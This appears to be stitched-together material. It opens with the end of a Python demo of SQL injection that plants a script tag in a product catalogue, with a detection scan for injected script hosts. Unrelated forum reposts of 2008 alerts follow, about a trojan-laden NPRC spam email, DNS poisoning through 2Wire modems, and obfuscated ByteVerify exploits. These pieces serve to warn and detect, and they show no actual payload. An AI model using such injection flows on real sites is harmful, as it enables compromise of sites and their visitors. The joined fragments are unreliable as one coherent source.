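    cur = conn.execute("SELECT description FROM products WHERE id = ?", (pid,))
    return [r[0] for r in cur.fetchall()]


def injected_hosts(text):
    """Hosts of every <script src=...> found in a text field."""
    return [h.lower() for h in SCRIPT_SRC_RE.findall(text or "")]


def find_injected_rows(conn):
    """Ids of rows whose description loads a script from a watched host.  The
    LIKE pre-filter keeps the scan cheap on a big catalogue; the regex confirms."""
    cur = conn.execute(
        "SELECT id, description FROM products WHERE description LIKE '%<script%' ORDER BY id")
    hits = []
    for pid, text in cur.fetchall():
        hosts = injected_hosts(text)
        if any(h == w or h.endswith("." + w) for h in hosts for w in WATCHED_HOSTS):
            hits.append(pid)
    return hits


if __name__ == "__main__":
    conn = new_catalogue()
    lookup_vulnerable(conn, ATTACK_INPUT)
    print("rows now carrying the script tag:", find_injected_rows(conn))
    try:
        lookup_safe(new_catalogue(), ATTACK_INPUT)
    except ValueError as exc:
        print("parameterized lookup rejected the input:", exc)
```

The scan only covers one table and one column; the real cleanup has to walk every text column of every table, and, as the article warns, search-engine caches of the affected pages will keep serving the tag after the database is clean.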
 
Malicious Code: NPRC e-mail (SPAM) loaded with trojan horse

FYI...

- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=835
January 08, 2008 - "Websense® Security Labs™ has discovered a new email attack that uses a spoofed email message which claims to be from the National Payroll Reporting Consortium (NPRC). This attack is similar to previous attacks claiming to originate from the IRS, Better Business Bureau, and Department of Justice. We have tracked all of these attacks, and reported them as they were discovered. The message claims that the recipient's company has made numerous misrepresentations regarding worker classification, in an attempt to lower compensation costs. The email asks the recipient to fill out an attached form and fax it to NPRC's fraud department in order to resolve the issue. An email attachment contains a Trojan downloader with some backdoor capabilities. It is a malicious Windows executable file, with an MD5 of 854e259c7c0ac6fb2a26963a9d77600d ... At time of writing, only one anti-virus vendor had detected this malicious code."

(Screenshot available at the URL above.)

:fear:
 
Mexico: DNS poisoning via DSL modems

FYI...

- http://blog.trendmicro.com/targeted-attack-in-mexico-dns-poisoning-via-modems/
January 11, 2008 - "...TrendLabs researchers have received reports of what appears to be an attempt of a massive DNS poisoning attack in Mexico... the attack begins with the exploitation of a known vulnerability in 2Wire modems*. The said vulnerability allows an attacker to modify the local DNS servers and hosts. One of the main Internet Service Providers in Mexico offers 2Wire modems to their customers, and it is estimated that more than 2 million users are at risk... exploit arrives with a newsy email message... once an unsuspecting user opens the email in its full HTML format, the exploit code automatically attempts to access the modem’s Web console and modify the local host database to redirect all requests for banamex.com — the Web site of one of the largest banks in Mexico — to a fraudulent site... The malicious email message also promises a “video” and includes a link that points to a malicious URL where the .RAR archive Video_Narco.rar can be downloaded. This archive contains the malicious file Video_Narco.exe..."
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4389

:fear:
 
Obfuscated Java.ByteVerify exploit - web sites in China

FYI...

- http://isc.sans.org/diary.html?storyid=3826
Last Updated: 2008-01-11 20:19:06 UTC - "Come April, we will reach the FIFTH anniversary of the ByteVerify vulnerability (MS03-011). Untangling some seriously obfuscated JavaScript coming from a couple of web sites in China earlier today, I ended up with - yes, a ByteVerify exploit. Also in the package was an MDAC exploit (MS06-014), whose second anniversary will be up this April as well.
> To see these exploits still in use can only mean one thing: They still work.
And they seem to work well enough that the bad guys can instead sink their time into developing new obfuscation techniques and other ways to make analysis more difficult -- only to deliver a five year old exploit in the end. Not a very stellar testament to patching efforts."

:fear:
 